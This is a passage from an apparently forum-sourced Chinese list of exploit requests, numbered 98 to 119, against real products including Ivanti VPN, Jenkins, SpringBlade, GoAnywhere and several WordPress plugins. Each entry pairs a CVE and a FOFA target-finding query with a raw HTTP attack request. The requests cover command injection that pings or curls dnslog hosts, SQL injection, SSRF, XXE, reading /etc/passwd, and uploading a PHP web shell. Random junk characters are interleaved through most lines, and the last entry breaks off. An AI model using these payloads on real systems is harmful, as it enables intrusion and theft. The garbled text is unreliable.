Accept-Encoding: gzip# L3 t! D* o0 k( V& @
Connection: close. R3 h' D  P7 N0 z
Cookie: rememberMe=PAYLOAD1 R; c0 o* I1 p* o7 H
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"0 B; B1 x2 O( \' \; Y4 b8 O  V+ \

% P) q5 S" t- t0 v8 e, y9 S9 ]9 c) t/ |. ^0 E& T+ w
98. SpiderFlow爬虫平台远程命令执行1 Q0 i6 h5 W; X
CVE-2024-0195
( A8 w& W$ v) N2 jFOFA:app="SpiderFlow"
7 W- ]4 y3 n! yPOST /function/save HTTP/1.1
7 z: x9 m- o8 y( h( x: ~Host: 192.168.40.130:8088
4 M) G7 S3 E+ Y/ D4 o# yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ i/ p- D* Z/ E0 a! QConnection: close
! m1 `- b, G; M; h! k, c, {Content-Length: 121
* }  N& E% X9 c9 gAccept: */*
" ?  D* ^! _$ r9 GAccept-Encoding: gzip, deflate- o4 a& i+ @4 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 S' J1 }) d3 h2 w& D
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
! Y6 T: D$ x+ k( KX-Requested-With: XMLHttpRequest! l1 k% P# s) [' F0 q  V7 o* b4 j% m
" ~( ~, x. `  M/ l
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B1 U9 [4 {3 F) ]) s+ ]( d

: A$ x" q9 b. H" W9 E: W, J5 d! }# H6 v% H- L: y3 L- h* V
99. Ncast盈可视高清智能录播系统busiFacade RCE' I5 e+ Y# M- a+ L1 @3 Y
CVE-2024-0305- X* ^% M7 `" U# o3 s1 K
FOFA:app="Ncast-产品" && title=="高清智能录播系统"; K( R+ x( ?# C  F# \0 g1 m
POST /classes/common/busiFacade.php HTTP/1.1
8 b. e1 a0 t  V, t8 Y* H: @7 KHost: 192.168.40.130:8080# e7 h3 T1 M7 t" R. i. n! D  a% s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 T* R2 q( L+ [1 J# s
Connection: close
( s7 t4 ]' ^# q  UContent-Length: 154$ _' O) ]4 b  E
Accept: */*8 w. H# N$ ]' o( y
Accept-Encoding: gzip, deflate
; F! S, O8 Q) K& R/ k# N  ^3 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! e" u5 l8 O- e' w& Y% qContent-Type: application/x-www-form-urlencoded; charset=UTF-8
8 y" G+ v* L. H+ pX-Requested-With: XMLHttpRequest/ y* \( l. V9 H& @
% S$ M0 z6 {' Q" w4 s
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D2 f4 y. f) i0 D5 l0 F- ?# T8 z

% z" s  M, j  L$ M, P2 H" M0 k; m! G, y+ u
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传- \' |+ @' h1 y
CVE-2024-0352
+ S) p) {8 M% y/ P% qFOFA:icon_hash="874152924"
+ }/ a! p8 v* jPOST /api/file/formimage HTTP/1.18 X9 z) u. O! |9 G9 r9 a
Host: 192.168.40.130
0 Y1 K, Y& m+ v  N! X* TUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
; j9 O7 h! {7 s5 V# fConnection: close7 D5 j" P6 p/ [# h% `) g! n
Content-Length: 2017 z# o/ m1 A6 R* d3 Z7 Z. ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei" T$ `- k5 O* C0 F9 z6 ^* g
Accept-Encoding: gzip
* N) K1 P- l2 k9 V/ U: I
/ y0 {% d% z$ M0 ?+ \5 s1 s------WebKitFormBoundarygcflwtei
9 G0 ^  V1 t5 ~" k2 VContent-Disposition: form-data; name="file";filename="IE4MGP.php"
: l6 Z. h- A0 S9 m, g7 [Content-Type: application/x-php" c) s# w: K' i( C1 N

8 `* n2 A4 N, Z/ [2ayyhRXiAsKXL8olvF5s4qqyI2O
' Q+ [6 F5 {' V# D------WebKitFormBoundarygcflwtei--
: m/ x  q& x+ ]/ ?
" t; B, @, V# z6 I  s! l! @' m: T& u, _! z
101. ivanti policy secure-22.6命令注入
% ]9 n- q  i) \3 D6 iCVE-2024-21887
) k$ b9 L4 G6 q& C1 ]FOFA:body="welcome.cgi?p=logo"  `: c1 x1 {: u8 D! B
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1, @" @/ u4 G  H9 o2 Z5 U0 O* g
Host: x.x.x.xx.x.x.x
' ?; z- M" y. u+ cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 a8 @7 f) N" q; Z: B9 a, S
Connection: close
% ~% L( `- I8 W. t. t, V3 H; XAccept-Encoding: gzip: ~4 A% Z0 f, o& f( B/ V

2 t% L& S0 `- f8 w0 v: {+ g# q- M; b! e0 V6 \! I5 P
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行3 d# E/ x0 m; Z8 J6 `' \. V& d* Q- s
CVE-2024-218939 m- R% o% Q& i' O0 L7 c5 B
FOFA:body="welcome.cgi?p=logo"
+ h. i% P0 k0 L4 C: j& VPOST /dana-ws/saml20.ws HTTP/1.1) U9 |0 v8 L; S
Host: x.x.x.x
1 @5 Q8 G* N  y2 ^9 l- N% p+ T! aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 q% }3 ~9 o  E' l" ZConnection: close
6 \- j) W6 p1 \8 B# ^) W* OContent-Length: 792* ~7 L' ^& G1 u: \1 u' `; E1 |% K- a
Accept-Encoding: gzip" `$ R' T( N" G( X. r7 X
- S, U1 C! e3 a* m9 R! |
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
4 A; C- k( a3 m: b% I! X5 }& J* \0 ?) k% q$ ^# {
103. Ivanti Pulse Connect Secure VPN XXE' G! g' I8 S2 k* d- _; N, p% Q
CVE-2024-22024; f1 M' D* A. l( J% K' E
FOFA:body="welcome.cgi?p=logo"
5 f1 x+ j2 G3 [2 L' M0 z% }POST /dana-na/auth/saml-sso.cgi HTTP/1.1! a' n) h" o+ N0 r
Host: 192.168.40.130:111
" o$ `9 h2 ~( r. l$ I8 m7 d/ _4 ]User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
$ B  c' s' Z( c. DConnection: close/ n: e/ F1 o2 `/ _9 j: {& J
Content-Length: 204) h: T8 ^* j# E8 f- i
Content-Type: application/x-www-form-urlencoded
: g) T, s! I  J/ gAccept-Encoding: gzip
  _8 X; o8 c+ p- z; m  k) j& }- R* Q; b6 |; t* V+ n% v. O. L
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
- j4 l) Z% l, [9 }" q1 ~% m
5 \8 b: z# c* |$ a1 D. ?3 X. _4 [5 j7 V
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
  n! t! d4 L9 `. S3 \1 t<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
9 U. @0 }9 k& e& v
6 G: K) k! L, J, ~' w1 m3 h! m; w" v
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
2 Z5 S: s/ B* Q' RCVE-2024-0569- V3 \1 z; B1 U. s. i7 L9 z
FOFA:title="TOTOLINK"
  l1 D8 E9 w+ B9 i' ~; I; {; X- qPOST /cgi-bin/cstecgi.cgi HTTP/1.1
. l8 L5 N) Z. U" c0 V) ]: H) THost:192.168.0.16 X: \( Y, P8 S# _/ F1 e# F  Z+ |
Content-Length:41
, y) `) I$ P' o$ u3 [& MAccept:application/json,text/javascript,*/*;q=0.01
* s3 A  I- h( G4 o! I% [0 fX-Requested-with: XMLHttpRequest$ t6 V! W# ]8 n% C
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.365 ]0 U$ E; h0 k. p! f* J* I& j
Content-Type: application/x-www-form-urlencoded:charset=UTF-81 T, b3 \% a5 k, l/ F9 \
Origin: http://192.168.0.1* ]! F; k, ]4 h' @
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
" P& k3 J0 \# t3 |( S) P0 m1 HAccept-Encoding:gzip,deflate6 Y9 M' @  T7 A' t4 p
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
) l0 E- _1 ]. c4 G7 [- UConnection:close
, R3 n: c: y0 u1 Z0 R! d, P: J2 T4 E" t/ e) p
{
8 a4 P' Z. o5 M9 w/ P) e4 G8 @5 i"topicurl":"getSysStatusCfg",
! v5 c( q3 @6 }0 l" e1 O"token":""
' ?; c5 e; r; T; P6 J3 V; G}
4 @/ D& Y' D( x6 o# b2 w
: d# K- k8 _( z6 w# G! A$ i3 e105. SpringBlade v3.2.0 export-user SQL 注入( a) t+ x5 w6 O  o  ~' X: L" D# z7 ?
FOFA:body="https://bladex.vip"
" S2 i/ [4 |& R, {' N9 ?& I+ R) Uhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1  p# @; ?& s) ^# Y' F$ E1 J- L

0 b4 ^; }& _" q8 U) R" l106. SpringBlade dict-biz/list SQL 注入+ j2 Q. {1 f2 w( g3 g# S; [3 _
FOFA:body="Saber 将不能正常工作"' z. B- v8 c4 }6 b% V# {0 F' V# Z
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1- T) j/ c; d' N# h5 n
Host: your-ip
8 m, f: M: D# U" P0 }+ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& p: e! ]4 a- O/ l/ \3 C' x$ RBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
; x2 e/ m$ ]+ @. y0 z" ~1 r& QAccept-Encoding: gzip, deflate' Y' c8 Z4 v) t$ i' G1 ]7 }3 b
Accept-Language: zh-CN,zh;q=0.9) i3 Y4 Z+ e) o, \
Connection: close  |6 J& r+ E% r6 \5 ]* q
0 ^3 {! |+ C3 j5 l& o, `; X
( b; a( O; y( v* ?, W3 n2 D0 y2 ?
107. SpringBlade tenant/list SQL 注入5 G2 X- T- r% m. y/ H+ l
FOFA:body="https://bladex.vip"
1 x  `4 ?4 Q" @; v. ?GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! `3 Q7 [3 V7 a/ v+ fHost: your-ip" |: \5 F" q1 W. O" U/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& O# c% I: F) {6 yBlade-Auth:替换为自己的
" o; j+ a: j. b$ M9 ~Connection: close
5 s; @" M& G  r9 ?9 N" v4 I. L; S- W* r  w/ {, q) u+ e$ W
/ T% ?" X7 y+ R8 ]( E3 V* l
108. D-Tale 3.9.0 SSRF" b; |- ]* D3 H) p/ P. ^3 T
CVE-2024-21642
7 L$ x' _2 {# f0 AFOFA:"dtale/static/images/favicon.png"' J7 A) J. g1 d- _6 e
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
/ E) D# [7 u  l5 |Host: your-ip
- ^$ q( v- V1 S/ _( ]. IAccept: application/json, text/plain, */*
+ `& e9 U1 L+ c" Y) s& rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ u  `$ u5 o) P/ K+ d2 PAccept-Encoding: gzip, deflate) v  b& O% S0 F4 {/ h% }/ s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
# ]' X6 D7 @9 G! X' g/ AConnection: close
( D3 Z0 ~8 {. O5 f0 ^; [1 l. K* }5 m* V
+ `: M: w$ {! Y/ l1 l6 _5 P. z6 T
109. Jenkins CLI 任意文件读取) u3 C5 ]- k  C
CVE-2024-23897# c) f# F3 F$ X( ]  E
FOFA:header="X-Jenkins"! q2 P' z9 n, k, q
POST /cli?remoting=false HTTP/1.15 c3 ^/ r" w( {; L9 R
Host:* t4 E& J( [+ U7 K6 p% _# G
Content-type: application/octet-stream
; z% ^2 H( u! }' F! RSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
. @' E, m! o9 S" F2 ~" f8 q, XSide: upload5 p& ]* ^3 s/ U5 k- C
Connection: keep-alive
+ j- |. C  E9 ?* v! G4 vContent-Length: 163
( T7 ?3 D" G% G; Y9 [" N1 E" Y( i
  Y7 b/ ?) Z+ @" a' c6 ab'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
. ]% t' z6 t, p; U, v2 Q
& N8 l- t( b' {
, t8 w0 g  J1 X9 m# C) X) O) A. U% i8 SPOST /cli?remoting=false HTTP/1.1, q% X8 C# n" Q6 ]: b' p
Host:1 i: a* k8 j! y& I+ I
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# f9 P, E) k) u2 a# {* L& Q9 c
download
+ C: t3 ^- S1 o% m  d0 Y$ j  t& {Content-Type: application/x-www-form-urlencoded
7 Q7 R$ ?* c6 `/ V% {0 RContent-Length: 06 Z$ o/ d8 A3 j' _. b/ J* Q
) n7 ~2 [2 F' v$ |9 J" \; h

7 D8 B2 f% R4 s0 x6 Y/ o8 tERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin/ W0 G% k- F5 J% J
java -jar jenkins-cli.jar help
9 u# b3 J7 e; o2 L[COMMAND]
( R( Y9 V& i# {, [0 [Lists all the available commands or a detailed description of single command.
! f5 W0 l) O2 w6 g$ @- L7 O COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)* m$ e: Y, X9 `% f8 k. n

4 z: p: v5 H2 u' l; e- f- u* I8 k* @, s
110. Goanywhere MFT 未授权创建管理员
6 b- E# f9 l( \; V* MCVE-2024-02041 N3 D4 ^6 a1 C
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"7 e3 l6 J3 [: C$ ]" {+ G2 |
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
1 F& G' }, g0 c5 [9 G  U4 o$ sHost: 192.168.40.130:8000
4 y. m) y# i+ }User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
. J3 _- C/ `! n' `# A* AConnection: close
0 W0 G3 @6 m  `6 l) oAccept: */*
! J: K% {3 Q2 \5 }: G4 y+ l/ j) f$ ~Accept-Language: en
+ h% }0 F9 G0 G( l- |Accept-Encoding: gzip
& P# H$ T9 l& s
- K# A. g6 Z* }3 o6 [) f2 p
- N6 y& ]8 c: A  ]3 P111. WordPress Plugin HTML5 Video Player SQL注入
( e) q- ^: s) j5 dCVE-2024-1061- M+ [, V, {6 F. m/ e4 y* O+ I! s+ d
FOFA:"wordpress" && body="html5-video-player"
! G6 ^7 O0 b  A1 mGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
1 t& T; o. C4 y  i. D! y0 NHost: 192.168.40.130:112
8 D# j7 @* G! ]# S6 F3 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 T1 |5 ?3 c0 k2 }9 k1 aConnection: close7 h- j* C9 ?$ j5 B0 s* [* S
Accept: */*: ^- ?0 g2 H. x$ a7 J( m
Accept-Language: en
2 |( D: ~  l& zAccept-Encoding: gzip
! h1 X, ]$ I8 N! W2 \/ Z0 [
: ^) F, q; v9 a4 u* h9 ]9 D+ q( d+ G% Z: ~$ D# r: M
112. WordPress Plugin NotificationX SQL 注入
4 [/ I0 r& V$ t/ r7 fCVE-2024-1698! M$ o# C) U7 y
FOFA:body="/wp-content/plugins/notificationx"
4 ?2 C- T) v7 f* M3 U6 EPOST /wp-json/notificationx/v1/analytics HTTP/1.1
8 B) f5 _/ e2 k" iHost: {{Hostname}}
1 m  S# @" J0 c$ P5 g  zContent-Type: application/json& }/ o; d2 \' T  U* q% d

9 c) q& B8 B' Y( K0 K{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
. g  T* u; ~8 D8 `: ]3 B9 I# |% b# G  q% I  z! h
# F1 l6 n7 O2 D. @0 f( l8 s
113. WordPress Automatic 插件任意文件下载和SSRF% Q: ]3 }1 |: r6 Y& c
CVE-2024-27954
+ w" m; T$ `' p2 }6 |FOFA:"/wp-content/plugins/wp-automatic"$ _' v, x& G* _/ I  X- X
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1' |) W+ n- q+ g9 B. u3 E
Host: x.x.x.x
+ w% o( a5 Z% L/ jUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ y* A+ G* j/ C& ?5 _' R
Connection: close
1 l  H6 w& M+ R: T& ]( u8 e  BAccept: */*
2 f- f; o; O! @+ j5 b& D6 h6 BAccept-Language: en
+ ]( O" T$ M# J! sAccept-Encoding: gzip+ o2 g2 W2 `+ O  ^

7 n. S2 x; E$ r9 n
( s7 W$ I* v4 Y: |114. WordPress MasterStudy LMS插件 SQL注入; v  L# S! K( D/ y
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"7 ?6 ^( h# g% v6 L* f! L; u
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1. ?: s5 E6 W% A4 L
Host: your-ip
: f1 M) D. l) H+ |# l4 @# iUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" l& n9 _7 D- D; ^: NAccept-Charset: utf-8& I! C: E8 a4 G/ V5 m
Accept-Encoding: gzip, deflate% d; r3 }0 t; A( N: \% b+ ?
Connection: close
0 P$ X5 N9 ]# |6 L/ ~# r% m' a7 U; ^& J2 a
) B4 X2 |- {6 k  a! [
115. WordPress Bricks Builder <= 1.9.6 RCE8 K0 |5 z. d9 c: W% p/ u* v5 }. H
CVE-2024-25600
- I4 W2 w' X9 Y6 B/ HFOFA: body="/wp-content/themes/bricks/"9 J  k5 r8 X8 R1 r
第一步,获取网站的nonce值
  Z6 V$ o4 M: j9 V: V' m1 g$ n7 k7 y0 {GET / HTTP/1.1
, e4 G% Z1 r" r( U" Z$ @2 D4 YHost: x.x.x.x
# Q" p2 d& ^/ S, ^9 _User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
% M- m# m8 d; M) JConnection: close
, G8 w3 a! ?" Q# V& @0 IAccept-Encoding: gzip
" R: y3 I' W9 M7 U1 `. r
3 n, U; H8 \! _, G" ~2 b' H
( I3 }2 x* G5 I第二步替换nonce值,执行命令
2 B3 \0 E- {$ N# H4 \. {! JPOST /wp-json/bricks/v1/render_element HTTP/1.1
$ V3 R2 ^" m1 B0 W7 lHost: x.x.x.x9 h+ z8 N+ C" Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' Y3 g0 l1 v' U" y' ?( ^0 |Connection: close
! `( d: t( D- @' F) X: |Content-Length: 356$ v4 F9 i3 ~& u
Content-Type: application/json; ]) Q5 @; |9 F. }% U, _
Accept-Encoding: gzip
. C& ~5 ^7 e9 X  D0 U* {1 m1 a9 I1 x9 e1 l
{
8 m6 D% w, l) C( Q, U6 v) _* \"postId": "1",
" Y2 T4 q. D: F) E) _/ y: k  "nonce": "第一步获得的值",; Y4 Y1 i+ x+ t4 m. N
  "element": {/ _% a4 L! e# y) A7 I+ w7 l# v- `- o% i
    "name": "container",% V1 v& _* F$ {
    "settings": {
4 {  n* ?* @" @7 B' f. Q      "hasLoop": "true",0 B: ~  E" w2 v$ V
      "query": {# a; \  x( N- z! Q
        "useQueryEditor": true,
7 J. m) g& c2 n0 H        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",' w: J* v/ w- J9 T
        "objectType": "post") R  Y4 D7 J! m9 x2 `9 ~2 b* v
      }1 Q+ m7 L% K/ j4 D% _) H$ p. V
    }
$ N) L+ N" E* |8 n; j+ a: m  }  Q* H$ U, U* o
}
4 \+ }* f* @7 n2 j# c5 O% P
3 m6 K/ c$ D& j6 {) k# ]4 O1 I! w! Z" B2 f9 D! _( D
116. wordpress js-support-ticket文件上传/ Z& R+ p& Z+ P
FOFA:body="wp-content/plugins/js-support-ticket"
% K5 D) G, e) n4 s' t1 IPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
; ]2 l  ^! j0 j+ c% h2 {' FHost:2 k5 p' ^7 B+ `7 {5 Q6 w' u
Content-Type: multipart/form-data; boundary=--------767099171% @0 r: C  t1 O4 f) L0 l
User-Agent: Mozilla/5.0
  ^+ _  U; g4 K3 V% r
' ]3 I( {* p7 E; A----------767099171) s) `: b6 R- [
Content-Disposition: form-data; name="action"4 o6 j& H4 ~1 D: Y% M6 g% O1 w3 [
configuration_saveconfiguration
+ V2 Q% M/ z( |3 w# M% {----------767099171
. p; ?" u+ d( x: c) ^# q7 C: EContent-Disposition: form-data; name="form_request"8 F% Y* u8 x' u; T
jssupportticket
% \) p( p  x% v: @+ i----------767099171
9 H2 N! Z! _! d5 `, T) ~Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"$ G0 X: @& ^- }8 W
Content-Type: image/png
3 R- A, @5 f" x  S8 \# q2 R----------767099171--
) O: Y* M5 @' v/ E  a/ w
+ ?; h4 n: W- r, V3 [" s8 O4 a8 ]7 z' H2 `
117. WordPress LayerSlider插件SQL注入
# g3 h/ O# I3 o5 b! B! ]7 Dversion:7.9.11 – 7.10.0
. n4 `  H( u/ I3 r0 sFOFA:body="/wp-content/plugins/LayerSlider/"
0 Q7 y8 C, H% Y9 m" @: HGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
4 P; ]% K, |7 g# R2 S- s; H$ C/ ^Host: your-ip, N7 m0 m" u% W' y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% F* o2 P* l  c" y) O' k: Z8 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 p( }3 @8 Y! O/ Q, AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) g/ f7 _3 u- d, r( s+ |  k7 CAccept-Encoding: gzip, deflate, br
6 N- r; s6 F' a5 c2 G2 HConnection: close
- T' f2 H, D  I" CUpgrade-Insecure-Requests: 1
% v+ N: M2 n% b7 n0 ]) {
1 ^7 D. j2 ~& j: t& T2 h. W  n
: w* ?& V8 z4 R4 D118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
" B6 M  s) X5 ZCVE-2024-0939" A, G6 i' b5 h
FOFA:title="Smart管理平台"# X7 n. }- s! j$ O' H
POST /Tool/uploadfile.php? HTTP/1.1& a8 |  q8 G4 N" ~
Host: 192.168.40.130:8443- Y3 ?' E3 X1 v
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8: A  }1 [8 `9 ]4 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
( D& v+ K# ~" D6 M+ I6 Q/ I: K+ E0 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ R$ c0 N: T$ `  g2 P* FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) n, k1 e9 @2 W
Accept-Encoding: gzip, deflate
$ u7 V9 l5 a& oContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
* _$ L8 G  i* E" J3 A& u& @+ hContent-Length: 405
4 O; t9 M4 w7 k, i1 r" rOrigin: https://192.168.40.130:8443" r0 R, h* P% O
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
$ V0 @6 f7 o3 dUpgrade-Insecure-Requests: 1
' `/ P# |  h- d5 tSec-Fetch-Dest: document
/ b5 \  n1 R# g8 J1 q8 sSec-Fetch-Mode: navigate
: V: @, E( S4 J2 u9 E& d: k7 ~Sec-Fetch-Site: same-origin
0 e; e+ @; r1 {2 x( W# X* Q: \Sec-Fetch-User: ?1
9 V- C# ^# f. W, @5 ~/ nTe: trailers
( D. t/ i( g/ ]9 AConnection: close  E6 p4 n# t; A' K$ j) J- G  W) X
' y" ~9 e5 V$ J8 K+ s2 Q
-----------------------------13979701222747646634037182887- G  Z8 B2 s. |3 U" \) B
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
! M8 J6 n5 k, y$ c% I" WContent-Type: application/octet-stream( l% J+ z; a# E5 p; Q4 L/ P

: U2 Q) k# ?7 |5 {<?php$ n- z3 Z- Z  @. ]2 w. @& e
system($_POST["passwd"]);
+ b  v/ j7 E9 w?>
) d/ y$ [$ ]4 ?# q7 \8 [-----------------------------13979701222747646634037182887
1 Q' X. o, s( d7 ~( ]1 c- Z- RContent-Disposition: form-data; name="txt_path"
, s8 J; z7 A. l6 l' O. p: ^  `+ R, q% e
/home/src.php. u8 k% O' D& U- |( {, m; y2 j
-----------------------------13979701222747646634037182887--
3 S" A) N+ l2 q8 o$ D; N% N% C! X, D/ {) D) a

. o6 E+ j5 B, E* |3 m1 \( h# ^/ q访问/home/src.php' S+ H6 R2 _7 {, C% a

) h* w: R) _# q+ Z119. 北京百绰智能S20后台sysmanageajax.php sql注入
$ x9 A( i2 M: j% tCVE-2024-1254
" ^. T3 o; [9 a# a3 M4 I7 iFOFA:title="Smart管理平台"
* B. m+ v+ v" F$ [9 C9 @先登录进入系统,默认账号密码为admin/admin; a! C" k3 z7 ~' m
POST /sysmanage/sysmanageajax.php HTTP/1.11
